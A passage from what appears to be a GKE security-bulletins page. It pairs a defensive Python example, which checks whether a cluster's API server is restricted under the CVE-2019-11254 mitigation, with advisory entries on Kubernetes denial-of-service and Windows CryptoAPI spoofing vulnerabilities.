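Both CVE-2019-11254 entries (GCP-2020-004 and GCP-2020-003) point to the same interim mitigation: restrict which clients can reach the API server, either with Master Authorized Networks or with a private cluster that has no public endpoint. The following added example, not Google's code, classifies a cluster's control-plane exposure from the JSON that `gcloud container clusters describe <name> --format=json` returns. It reads the GKE Cluster API fields `masterAuthorizedNetworksConfig` and `privateClusterConfig.enablePrivateEndpoint`, and treats an authorized-networks list that contains a whole-address-space block such as `0.0.0.0/0` as no restriction at all, since that configuration satisfies the "enabled" flag without limiting any client. The cluster descriptions below are constructed for the example; `api_exposure` and the other function names are this example's own.

```python
"""Classify a GKE cluster's API-server exposure for the CVE-2019-11254 mitigation
described in GCP-2020-004 / GCP-2020-003. Added example, not Google's code."""
import ipaddress


def authorized_cidrs(cluster: dict) -> list[str]:
    """CIDR blocks from masterAuthorizedNetworksConfig, or [] when it is disabled."""
    cfg = cluster.get("masterAuthorizedNetworksConfig", {})
    if not cfg.get("enabled"):
        return []
    return [block["cidrBlock"] for block in cfg.get("cidrBlocks", [])]


def private_endpoint_only(cluster: dict) -> bool:
    """True for a private cluster whose control plane has no public endpoint."""
    return bool(cluster.get("privateClusterConfig", {}).get("enablePrivateEndpoint"))


def api_exposure(cluster: dict) -> str:
    """'private', 'restricted' or 'public' for the cluster's API server endpoint.

    Authorized networks count as a restriction only if every CIDR has a
    non-zero prefix length; 0.0.0.0/0 or ::/0 admits any client and is
    therefore reported as 'public'."""
    if private_endpoint_only(cluster):
        return "private"
    cidrs = authorized_cidrs(cluster)
    if cidrs and all(ipaddress.ip_network(c, strict=False).prefixlen > 0 for c in cidrs):
        return "restricted"
    return "public"


# Constructed cluster descriptions in the shape of `gcloud container clusters
# describe --format=json` output; field names follow the GKE Cluster API.
CLUSTER_OPEN = {"name": "dev", "masterAuthorizedNetworksConfig": {"enabled": False}}
CLUSTER_WILDCARD = {"name": "staging", "masterAuthorizedNetworksConfig": {
    "enabled": True, "cidrBlocks": [{"displayName": "anyone", "cidrBlock": "0.0.0.0/0"}]}}
CLUSTER_RESTRICTED = {"name": "prod", "masterAuthorizedNetworksConfig": {
    "enabled": True, "cidrBlocks": [{"displayName": "office", "cidrBlock": "203.0.113.0/24"}]}}
CLUSTER_PRIVATE = {"name": "internal", "privateClusterConfig": {
    "enablePrivateNodes": True, "enablePrivateEndpoint": True}}

if __name__ == "__main__":
    for cluster in (CLUSTER_OPEN, CLUSTER_WILDCARD, CLUSTER_RESTRICTED, CLUSTER_PRIVATE):
        print(f"{cluster['name']}: {api_exposure(cluster)}")
```

Clusters reported as "public" are the ones where the bulletin's mitigation is not in place and any client able to authenticate can reach the vulnerable API server over the network; those are the ones to prioritize for the patch version upgrade.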
GCP-2020-002
Published: 2020-03-23Updated: 2020-03-23
Reference: CVE-2020-8551, CVE-2020-8552
GKE
Description | Severity |
---|---|
Kubernetes has disclosed two denial-of-service vulnerabilities, one impacting the API server and the other impacting Kubelets. For more details, see the Kubernetes issues 89377 and 89378.
What should I do?
All GKE users are protected from CVE-2020-8551 unless untrusted users can send requests within the cluster's internal network. Use of master authorized networks additionally mitigates CVE-2020-8552.
When will these be patched?
Patches for CVE-2020-8551 require a node upgrade. The patch versions that will contain the mitigation are listed below:
Patches for CVE-2020-8552 require a master upgrade. The patch versions that will contain the mitigation are listed below:
|
Medium |
GCP-january_21_2020
Published: 2020-01-21Updated: 2020-01-24
Reference: CVE-2020-0601
GKE
Description | Severity |
---|---|
2020-01-24 Update: The process of making patched versions available is already underway and will be completed by January 25, 2020.
Microsoft has disclosed a vulnerability in the Windows Crypto API and its validation of elliptic curve signatures. For more information, see Microsoft's disclosure.
What should I do?
For most customers, no further action is required. Only nodes running Windows Server are impacted. For customers who are using Windows Server nodes, both the nodes and the containerized workloads that run on those nodes must be updated to patched versions to mitigate this vulnerability. To update the containers: rebuild your containers using Microsoft's latest base container images, selecting a servercore or nanoserver tag with a LastUpdated time of 1/14/2020 or later. To update the nodes: the process of making patched versions available is already underway and will be completed by January 24, 2020. You may either wait until that time and perform a node upgrade to a patched GKE version, or use Windows Update to deploy the latest Windows patch manually at any time. The patch versions that will contain the mitigation are listed below:
What vulnerabilities are addressed by this patch?
The patch mitigates the following vulnerability: CVE-2020-0601, also known as the Windows Crypto API Spoofing Vulnerability. It could be exploited to make malicious executables appear trusted, or to let an attacker conduct man-in-the-middle attacks and decrypt confidential information on TLS connections to the affected software. |
NVD Base Score: 8.1 (High) |
Archived security bulletins
For security bulletins prior to 2020, see the Security bulletins archive.